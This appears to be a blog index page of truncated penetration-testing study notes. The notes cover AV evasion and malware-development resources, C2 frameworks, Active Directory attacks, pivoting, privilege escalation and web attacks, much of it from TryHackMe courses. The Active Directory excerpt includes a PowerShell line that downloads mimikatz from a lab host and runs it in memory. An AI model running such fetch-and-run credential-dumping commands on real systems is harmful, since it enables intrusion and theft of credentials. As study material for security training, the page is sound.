Notes

Work in Progress Courses SEKTOR7 Institute https://maldevacademy.com/ EvasionEDR By Matt Hand Sources URL Description Category https://github.com/NUL0x4C/HellShell HellShell GitHub repository Penetration Testing https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/#weapon Exploit writing tutorial on Corelan.be Exploit Development https://www.corelan.be/ Corelan.be website Cybersecurity https://github.com/Krypteria/AtlasLdr AtlasLdr GitHub repository Malware Analysis https://labs.jumpsec.com/obfuscating-c2-during-a-red-team-engagement/ Article on obfuscating C2 during Red Team engagement Red Teaming https://github.com/matterpreter/DefenderCheck DefenderCheck GitHub repository Security…

Source Good tools Malware forums/channels/discord Test payload against AV Defcon – Writing custom backdoor payloads with C# GitHub – mvelazc0/defcon27_csharp_workshop: Writing custom backdoor payloads with C# – Defcon 27 Workshop Step by Step for obfuscating code AV Evasion MindMap – From Start to finish (AV) Anti-Virus – The Hacker Recipes General AV Evasion cheatsheet Check…

This is a list of Command and control (C2) servers that I’ve tested. Covenant Installation and setup From the Covenant GitHub, “Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform…

This is notes taken from the THM room ‘Wreath’, which is a great room for learning Active Directory and pivoting. https://www.tryhackme.com/room/wreath And from other sources. Summary What is pivoting? Pivoting is the art of using access obtained over one machine to exploit another machine deeper in the network. It is one of the most essential…

These are my notes from the Active Directory networks at TryHackMe, as well as notes from other sources. Inspo: Work in progress References Matrix Impacket – SecureAuth Name Explanation Tools/attack example Unconstrained delegation Constrained delegation Resource-based constrained delegation mimikatz.exe Dump hashes invoke-mimikatz ps1 version of mimikatz. To load into memory (New-Object System.Net.WebClient).DownloadString(‘http://192.168.119.120/mimikatz.txt’) | IEX and…

Buffers are memory storage regions that temporarily hold data while it is being transferred from one location to another. A buffer overflow (or buffer overrun) occurs when the volume of data exceeds the storage capacity of the memory buffer. As a result, the program attempting to write the data to the buffer overwrites adjacent memory…

This is my notes from the Junior Pentesting course at TryHackMe. This course takes you through the basics and some advanced topics regarding penetration testing. Introduction Privilege escalation will require you to follow a methodology similar to the one given below:  Information Gathering Permissions icacls – Displays or modifies discretionary access control lists (DACLs) on…

This is my notes from the Junior Pentesting course at TryHackMe. This course takes you through the basics and some advanced topics regarding penetration testing. Linux Privilege escalation checklist https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist Enumeration hostname The hostname command will return the hostname of the target machine. Although this value can easily be changed or have a relatively meaningless string (e.g….

This is my notes from the Junior Pentesting course at TryHackMe. This course takes you through the basics and some advanced topics regarding penetration testing. Metasploit: Introduction The main components of the Metasploit Framework can be summarized as follows; msfconsole: The main command-line interface. Modules: supporting modules such as exploits, scanners, payloads, etc. Tools: Stand-alone…

This is my notes from the Junior Pentesting course at TryHackMe. This course takes you through the basics and some advanced topics regarding penetration testing. NMAP Live Host Discovery Scan Type Example Command ARP Scan sudo nmap -PR -sn MACHINE_IP/24 ICMP Echo Scan sudo nmap -PE -sn MACHINE_IP/24 ICMP Timestamp Scan sudo nmap -PP -sn…

This is my notes from the Junior Pentesting course at TryHackMe. This course takes you through the basics and some advanced topics regarding penetration testing. What is a database? A database is a way of electronically storing collections of data in an organised manner. A database is controlled by a DBMS which is an acronym…

This is my notes from the Junior Pentesting course at TryHackMe. This course takes you through the basics and some advanced topics regarding penetration testing. What is Command Injection? Command injection is the abuse of an application’s behaviour to execute commands on the operating system, using the same privileges that the application on a device…

This is my notes from the Junior Pentesting course at TryHackMe. This course takes you through the basics and some advanced topics regarding penetration testing. XSS Payloads What is a payload? In XSS, the payload is the JavaScript code we wish to be executed on the target computer. There are two parts to the payload,…